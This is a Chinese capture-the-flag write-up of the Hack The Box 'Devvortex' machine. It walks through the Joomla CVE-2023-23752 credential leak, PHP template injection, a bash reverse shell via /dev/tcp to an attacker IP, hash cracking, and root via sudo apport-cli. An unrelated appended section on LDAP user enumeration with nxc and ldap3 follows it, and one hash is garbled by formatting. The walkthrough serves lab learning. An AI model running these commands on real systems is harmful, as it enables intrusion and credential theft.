HTB靶场- Devvortex

端口探测

nmap -sV 10.10.11.242

在这里插入图片描述
首先访问一下80端口,发现跳转到这个域名上了,所以要做一个host绑定
在这里插入图片描述

sudo vi /etc/hosts

在这里插入图片描述
成功访问网站,通过观察发现是一个静态页面
在这里插入图片描述

目录扫描

python3 dirsearch.py -u http://devvortex.htb/ -e*

在这里插入图片描述

扫描以后也没有什么可以利用的信息,接下来在进行收集

子域名探测

使用gobuster进行子域名扫描,如果没有seclists字典工具,需要下载

apt install seclists

——————————
gobuster vhost -w=/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://devvortex.htb/ --append-domain --no-error

在这里插入图片描述

可以看到扫描出来一个dev.devvortex.htb,还是需要host绑定
在这里插入图片描述
接下来我们在对子域名进行目录扫描
在这里插入图片描述
在这里插入图片描述
通过探测发现administrator,README.txt目录是有重要信息的
访问administrator目录,发现是joomla CMS
在这里插入图片描述
README.txt目录里泄露了版本信息
在这里插入图片描述
我们也可以通过joomscan这个工具进行扫描,得到版本号4.2.6

joomscan -u http://dev.devvortex.htb/

在这里插入图片描述

漏洞利用

Joomla4.2.6版本有一个未授权访问漏洞(CVE-2023-23752)
未授权路径

/api/index.php/v1/config/application?public=true

有账号和密码,数据库相关信息,可以尝试进行登录
在这里插入图片描述
lewis/P4ntherg0t1n5r3c0n##
在这里插入图片描述
成功登录
在这里插入图片描述
观察发现有两个用户
在这里插入图片描述

代码注入

并且在这里发现了代码注入
在这里插入图片描述
在这里插入图片描述
在error.php中加入phpinfo();看看是否执行,千万别忘了保存
在这里插入图片描述
成功执行
在这里插入图片描述

反弹shell

进行反弹shell

system(“bash -c ‘bash -i >& /dev/tcp/10.10.14.49/1234 0>&1’”);

在这里插入图片描述
在kali中进行监听

nc -lnvp 1234

访问http://dev.devvortex.htb/templates/cassiopeia/error.php进行代码的执行

在这里插入图片描述
成功反弹shell,但是权限不够,所以我们提升一下权限
进行会话交互

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

数据库连接

由于未授权漏洞我们可知是一个mysql数据库并且在joomla库中
进行连接数据库

mysql -u lewis -p
在进行输入密码

在这里插入图片描述

使用joomla数据库
use joomla;
展示数据库中的表
show tables;
把表中的数据显示出来
select * from sd4fg_users;

在这里插入图片描述
在这里插入图片描述

将logan的密码放在一个txt里
echo ‘$2y 10 10 10IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12’ >pass.txt
将hash值破解出来得到密码
hashcat -m 3200 -a 0 pass.txt /usr/share/wordlists/rockyou.txt --show

在这里插入图片描述

ssh连接

进行ssh连接

ssh logan@10.10.11.242

在这里插入图片描述
得到了user的flag
在这里插入图片描述

权限提升

查看一下sudo的权限,发现有一个apport-cli
在这里插入图片描述
去网上搜索发现有漏洞 地址
在这里插入图片描述
先创建一个pid

sleep 5000 &

在这里插入图片描述
进行连接

sudo /usr/bin/apport-cli -f --pid=4682

在这里插入图片描述
kill pid

kill 4682

在这里插入图片描述
输入V,在输入!进入到交互页面
在这里插入图片描述
现在是root权限
在这里插入图片描述
成功拿到root的flag
在这里插入图片描述

### 使用 NXC 工具通过 LDAP 枚举域用户 NXC 是一款功能强大的网络扫描工具,支持多种协议操作,其中包括 LDAP 协议。要使用 NXC 进行 LDAP 用户枚举,可以通过指定域名、用户名和密码来实现。 以下是具体的命令结构以及如何执行的操作: #### 命令格式 ```bash nxc ldap <target-ip> -u <username> -p <password> --domain <domain-name> --users ``` 在此场景下,假设目标 IP 地址为 `10.10.10.10`,并提供给定的凭证 `rose/KxEPkKe6R8su` 和域名称 `sequel.htb`,完整的命令如下所示: ```bash nxc ldap 10.10.10.10 -u rose -p KxEPkKe6R8su --domain sequel.htb --users ``` 此命令会尝试通过 LDAP 连接到目标主机,并利用提供的凭据枚举域中的所有用户账户[^1]。 #### 脚本解释 - `-u`: 指定用于连接的目标用户名。 - `-p`: 提供对应的密码。 - `--domain`: 设置活动目录的域名。 - `--users`: 请求脚本返回当前域内的所有用户列表。 如果成功完成身份验证,则应显示一系列属于该域的有效用户条目;反之,在遇到错误时可以根据提示进一步排查原因(如无效凭据或权限不足等问题)。 #### 注意事项 为了确保能够顺利访问远程服务器上的资源,请确认以下几点: - 验证所提供的用户名 (`rose`) 及其关联密钥是否有效。 - 确认目标机器开放了必要的端口 (通常是 TCP/389 或者 SSL 加密模式下的 TCP/636),以便允许外部客户端发起查询请求。 - 如果防火墙规则阻止了这些通信路径,则可能需要调整配置或者寻找其他可用方法绕过限制条件。 --- ### 示例代码片段展示 Python 中基于 ldap3 的简单实现方式 对于更深入的理解,下面给出一段采用 python 编写的示例程序,它同样实现了上述提到的功能逻辑: ```python from ldap3 import Server, Connection, ALL server = Server('ldap.sequel.htb', get_info=ALL) user_dn = 'CN=rose,CN=Users,DC=sequel,DC=htb' password = 'KxEPkKe6R8su' try: conn = Connection(server, user=user_dn, password=password, auto_bind=True) # Search for all users within the domain. conn.search('dc=sequel,dc=htb', '(objectClass=person)', attributes=['sAMAccountName']) entries = conn.entries if not entries: print("No users found.") else: for entry in entries: print(entry.sAMAccountName.value) except Exception as e: error_code = str(e).split()[0].strip('(').strip(')') if error_code == '52e': print('账号密码不正确') elif error_code == '775': print('账号已锁定,请联系管理员或等待自动解锁') elif error_code == '533': print('账号已禁用') else: print(f'认证失败,请检查账号 {error_code}') ``` 以上脚本展示了如何构建一个基本的 LDAP 查询过程,其中包含了异常处理机制以应对可能出现的不同类型的登录问题。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值